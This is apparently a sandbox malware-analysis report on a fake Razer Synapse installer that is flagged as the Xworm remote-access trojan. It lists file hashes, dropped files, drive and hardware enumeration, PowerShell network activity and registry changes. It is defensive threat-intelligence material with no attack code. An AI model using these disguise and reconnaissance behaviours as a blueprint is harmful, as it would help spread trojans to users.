memory/320-642-0x00000000064D0000-0x00000000064FF000-memory.dmp

memory/320-643-0x000000006B890000-0x000000006B8BF000-memory.dmp

memory/320-644-0x00000000063A0000-0x00000000063B0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar38A4.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2323d853ea82c3ee8deef0744ac9149d
SHA1 4c3af8436594b76f1d19964106c29a82aa55067b
SHA256 6f94cfa7279859519bf96429263a0c4a92a709ffd341580bfc42ef10b8e3fb53
SHA512 0826d31f4a5792b762ee366ea629154bad12bfa7fdbc5fa54f1788582797afd38623a7d5b7c0f2a971635c8f0bd6cdada61a03198ad30ca0822ce32e08a57d44

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416

MD5 dcf819ef97e85924ff4728bd7c940504
SHA1 ba11e9c265109987e57f2f80507c3d0f2fd824fe
SHA256 5a1aad8ad6c1c025bd896bdb80248726ae13968e5b3e518f78e85c77a6f4804c
SHA512 56cb889af75e5ddf691e427692740342e073f8e7d9510d7c2b03636eadbe667e50915dceb5f49ec7bd1c0dcce89f987508223f35c371207fb68ec3957055a44f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416

MD5 55540a230bdab55187a841cfe1aa1545
SHA1 363e4734f757bdeb89868efe94907774a327695e
SHA256 d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb
SHA512 c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9c8d9818f30f409b44a105f2ee400692
SHA1 c0c962f0c0f787b755688d04977d4bdf2093ac17
SHA256 1201746e7ceb432fb8561fd19cbee21511ea0e312c8ad05e71f0c5cdf3c9cc14
SHA512 9e6838d3ee2c3e1939610ce86fccee9c453359b7d4e79135842ed707ebde6f0330aed56c5d16f80da40927764354630cb8cc681028c56e9ebdb15d895281c3af

C:\Windows\Installer\Razer\Installer\App\dongleV2.json

MD5 60d1685c219502b67f777e6322e39da6
SHA1 07fca7b5a4d379e7eb244e4578c132d2c285546b
SHA256 fe8be471fa6bbd88d62b4c9c1305dccad43feef8c7e6e303f7a06ea7a383c073
SHA512 07e3cd2a29e65ed4cbc575a5424bd92075f2e2fc2d6049d50631b4a66ac6472305dcba3ff3018501e5b5e5677dbf563ba16c8a072af3773ab2e074fc0e63decc

C:\Windows\Installer\Razer\Installer\App\dockEID.json

MD5 0ba7699b22971832fb281493db7c4545
SHA1 84e905aa566baa398cd42b62670e438986559f84
SHA256 9c27c8e8af9db9c93bdec5981e8348758b8de6d21f7da7fd196f88e440c89561
SHA512 7dbb7c75aec1fac2c83f9084368291508cffa5b6a8217c258c90b01b2908881b5f226ab4229f2c87a30529208fed2a344397f7843de010bb2553b38a477e7a3d

memory/320-914-0x0000000002430000-0x000000000243A000-memory.dmp

memory/320-950-0x0000000006F30000-0x0000000006F5A000-memory.dmp

memory/320-966-0x0000000002430000-0x000000000243A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-09 14:25

Reported

2024-06-09 14:28

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

148s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch -p

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-heap-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\BLEConnectWrapper.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\fr-FR\Razer.RazerInstallerCommon.resources.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\f1706ee93dc7f7beccf0ac4274789d39_AxonLWI02.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-file-l2-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-timezone-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\msvcp140.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\rzS3detmgr.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\vccorlib140.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\svchost.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-datetime-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-util-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-process-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\f3a246fec45b5c3e594a917cf91e1be4_BoosterPrime.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\AWSSDK.Core.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\dummyProt.json C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\a6a8ab87779f3b131679289a63f21a91_LWI-Alisha3.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\6f8f3193d4fbdf128e65edd124a89bb7_GameDeals.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\f626abb1339220fca14dd5a9c50f16fc_LWI-SophiePro-2.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-localization-l1-2-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-private-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\concrt140.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\3eb94c6867b24b25995491da2b5b5536_SystemBooster.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\8e859396a7087d1d842e18f64b7edccd_LWI-SophiePro-0.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-stdio-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-string-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-utility-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\dockEID.json.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb C:\Windows\system32\svchost.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\cdb5dabe83b269c79ffa33d151a866c6_2018_Cortex_Booster_logo.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\AWSSDK.Kinesis.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\6aeeee0f40118daff6219b7498284665_RazerCortex.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-math-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\zh-CHT\Razer.RazerInstallerCommon.resources.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\vccorlib140.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\d1badd3700b1362d4906e40c015c8c30_lifestyle_chroma_studio.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\d1badd3700b1362d4906e40c015c8c30_light_chroma_studio.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\3d5634dcc8d1f363e54606c084ff3bc7_lifestyle_macros.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-handle-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-string-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-synch-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-heap-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\ef04b9e0ce1d81b72ccc5346252f5c6e_LWI-icon-hue.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-console-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-runtime-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\ko-KR\Razer.RazerInstallerCommon.resources.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-namedpipe-l1-1-0.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\dongleV2.json C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\de-DE\Razer.RazerInstallerCommon.resources.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\dongleV2.json C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\ce49f7233531adb107a6808f83ca9eca_LWI-Natalie-1.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\AWSSDK.Core.dll C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\dummyProt.json.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\fr-FR\Razer.RazerInstallerCommon.resources.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File opened for modification C:\Windows\Installer\Razer\Installer\App\ja-JP\ C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\[email protected] C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\20deaa463cf012355d39684aeabde199_light_synapse.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-sysinfo-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\ImageCache\5963643b12004933f6e785fec303d18c_LWI-SophiePro-6.png C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-namedpipe-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
File created C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-convert-l1-1-0.dll.tmp C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00DDF836BDF" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
